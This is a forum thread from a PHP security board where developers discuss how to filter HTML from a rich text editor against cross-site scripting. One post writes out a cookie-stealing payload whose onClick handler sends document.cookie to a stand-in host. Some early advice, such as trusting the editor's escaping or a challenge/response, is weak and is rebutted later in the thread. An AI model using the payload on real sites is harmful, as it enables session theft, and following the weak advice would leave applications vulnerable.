Rich text editing

Discussions of secure PHP coding. Security in software is important, so don't be afraid to ask. And when answering: be anal. Nitpick. No security vulnerability is too small.

Moderator: General Moderators

Post Reply
Roja
Tutorials Group
Posts: 2692
Joined: Sun Jan 04, 2004 10:30 pm

Rich text editing

Post by Roja »

If I have an extremely simple editing system (think blog, with little structure), and I add a rich text editor (such as FCKeditor), what general steps do I need to ensure security?

I'm presuming something like:

- Rich text editor for input
- Filter input (To remove what? How?)
- Add escaping for storage to DB
- Store to DB
- Pull from DB
- Escape output (To remove what? How?)
- Present output to user

The bolded items are the ones I am unclear on the specifics for, and would appreciate guidance. If we are allowing users to enter *rich text*, which includes html codes, I'm very unclear on the full range of items we need to filter to ensure no XSS, js attacks, and so forth.

I'm also unclear on the specifics of what you would escape in the output. By definition, we want html to come through, so what would we be htmlentities escaping?

Any specific guidance on these general concepts is appreciated. While I'm strong on security in other areas, these two items in this specific scenario is something I've always avoided as being too risky, but I can no longer do so.

Any pre-packaged solutions for any of the above steps is also welcome. By way of example, I'll be using adodb for the escaping for storage, and CRUD events. The solutions would need to be GPL-compatible.

Please be gentle. I know that I am normally one of the first people answering these types of questions, but this is an area where I am less confident, and I would appreciate the knowledge and understanding of the community to help me improve.
User avatar
Burrito
Spockulator
Posts: 4715
Joined: Wed Feb 04, 2004 8:15 pm
Location: Eden, Utah

Post by Burrito »

I can't give you an all-encompassing security resolution but I can start you off with this:

by default RTE's will automatically already be 'htmlentitied".

In other words, if I type in <script> in my RTE, it's going to interpret the "<" as < etc.

the way I've done it in the past is to use innerHTML of the element (usually an iframe) and copy that info to a hidden form var, then on post take the value of that form var and dump it into my db.

you'll still want to run it through mysql_real_escape_string() but other than that, I haven't run into any issues.
User avatar
pickle
Briney Mod
Posts: 6445
Joined: Mon Jan 19, 2004 6:11 pm
Location: 53.01N x 112.48W
Contact:

Post by pickle »

The dangers in the input & output are possible execution of code, and broken xhtml code.

fckEditor (and most other RTEs) allow you to edit the source code directly. It's easy then, to post broken code which breaks your displaying web page. Perhaps writing a parser or somehow using a command line version of htmlTidy could at least tell you if the xhtml code is malformed.

As for stopping PHP code from being executed - that's easy. Just don't ever handle that string in such a way as to be executed.

Javascript may be a little more difficult. Inline javascript will, of course, have to be put inside <script></script> tags - so you could just parse the input and strip out those tags and anything they contain.
Real programmers don't comment their code. If it was hard to write, it should be hard to understand.
User avatar
Ambush Commander
DevNet Master
Posts: 3698
Joined: Mon Oct 25, 2004 9:29 pm
Location: New Jersey, US

Post by Ambush Commander »

Mmm... as of the market stands now, no pure-PHP solution is satisfactory, mainly because they don't really "know" about the HTML specification. I've been working on something that does, and let me tell you, it's not easy.

The "best" way to do it would be to...

1. Lex the HTML fragment according to the SGML standard into tokens (MarkupLexer, finished that)
2. Take tokens and pass them through a DTD, which knows about the specification and can check for many things:
* Proper nesting (not just "do all elements close" but "did they try to put a block level element in an inline one"?)
* Proper attribute formats (at least a dozen RFCs for each including URLs and CSS)
3. Recompile the tokens into HTML
4. Run a gauntlet of compatibility checks, attempting to eliminate any possible browser quirks that cause non-standard behavior and could compromise insecure browsers (esp. IE, this happens ALOT)
5. If changes where made, re-rinse, until the HTML stops changing

Of course, no one in their right mind would do it (except me). But any other solution is unsatisfactory. This is the main reason why forums use BBcode, and why most systems that actually have HTML parsing don't do it completely correctly, and are hideously complex.

(I believe I've harped about this in a previous thread already, but I can't remember what it was)
josh
DevNet Master
Posts: 4872
Joined: Wed Feb 11, 2004 3:23 pm
Location: Palm beach, Florida

Post by josh »

Burrito wrote: if I type in <script> in my RTE, it's going to interpret the "<" as < etc.
and if I telnet in and type <script> in my POST data its not going to escape anything
pickle wrote: Inline javascript will, of course, have to be put inside <script></script> tags
What about

Code: Select all

<p onMouseOver="armagedon(); return false;"></p>
Or things along those lines?


I would personally say use a "fuzzy" whitelist, using preg

if the rich text is allowing bold italics underline and colors for example you can match against each one in turn

Code: Select all

preg_match('@<span style="color:#?([a-zA-Z0-9]+)?;" >([a-zA-Z0-9]+)</span>@');
This is just an example, I suck at regex
User avatar
Ambush Commander
DevNet Master
Posts: 3698
Joined: Mon Oct 25, 2004 9:29 pm
Location: New Jersey, US

Post by Ambush Commander »

I don't understand: how does matching a regular expression help escape it?
josh
DevNet Master
Posts: 4872
Joined: Wed Feb 11, 2004 3:23 pm
Location: Palm beach, Florida

Post by josh »

you let the parts of the submitted string that match the expression slide by, and you htmlentities() the rest of the string. I guess you would swap out those pieces of text for placeholders, then swap them back in after the escaping?
User avatar
pickle
Briney Mod
Posts: 6445
Joined: Mon Jan 19, 2004 6:11 pm
Location: 53.01N x 112.48W
Contact:

Post by pickle »

jshpro2 wrote: What about

Code: Select all

<p onMouseOver="armagedon(); return false;"></p>

Or things along those lines?
armagedon() will still have to be declared withing <script></script> tags. The worst that'll do (unless Roja defines a function armagedon()) is generate a script error....I think.
Real programmers don't comment their code. If it was hard to write, it should be hard to understand.
josh
DevNet Master
Posts: 4872
Joined: Wed Feb 11, 2004 3:23 pm
Location: Palm beach, Florida

Post by josh »

That's an example. instead of calling that function you can put javascript right in there, here's a different example though:

Code: Select all

<a href="#" onClick="window.location.href='http://cookiestealer.com/script.php?ssid='+document.cookie">free beer click here</a>

no <script> tags needed
User avatar
Burrito
Spockulator
Posts: 4715
Joined: Wed Feb 04, 2004 8:15 pm
Location: Eden, Utah

Post by Burrito »

jshpro2 wrote: and if I telnet in and type <script> in my POST data its not going to escape anything
so use a challenge / response on your form to prevent that
User avatar
Ambush Commander
DevNet Master
Posts: 3698
Joined: Mon Oct 25, 2004 9:29 pm
Location: New Jersey, US

Post by Ambush Commander »

Aw, come on, it's not that hard to spoof a challenge response (the challenge is for protection from third party attackers). Anything client side cannot be trusted. The RTF editor takes a WYSIWIG editor, translates it into HTML, and then sends it to the server as regular POST data.
User avatar
shiflett
Forum Contributor
Posts: 124
Joined: Sun Feb 06, 2005 11:22 am

Post by shiflett »

How much HTML do you want to allow? For simple things, I find it easiest to escape everything and then convert allowed entities back to their original form. This also lets you make sure the user has closed bold tags and things of that nature.

For more complex needs, you might find this helpful:

http://cyberai.com/inputfilter/

It lets you take a whitelist or blacklist approach with both tags and attributes, and it also has an option to automatically remove common problems.
User avatar
Ambush Commander
DevNet Master
Posts: 3698
Joined: Mon Oct 25, 2004 9:29 pm
Location: New Jersey, US

Post by Ambush Commander »

Note that inputfilter isn't perfect, and if you make it too permissive, it will let malicious output through (only because it doesn't actually know about the specification), although at the very least it will cause your document to stop validating (eg. it doesn't check proper nesting of blocks and inlines).
Post Reply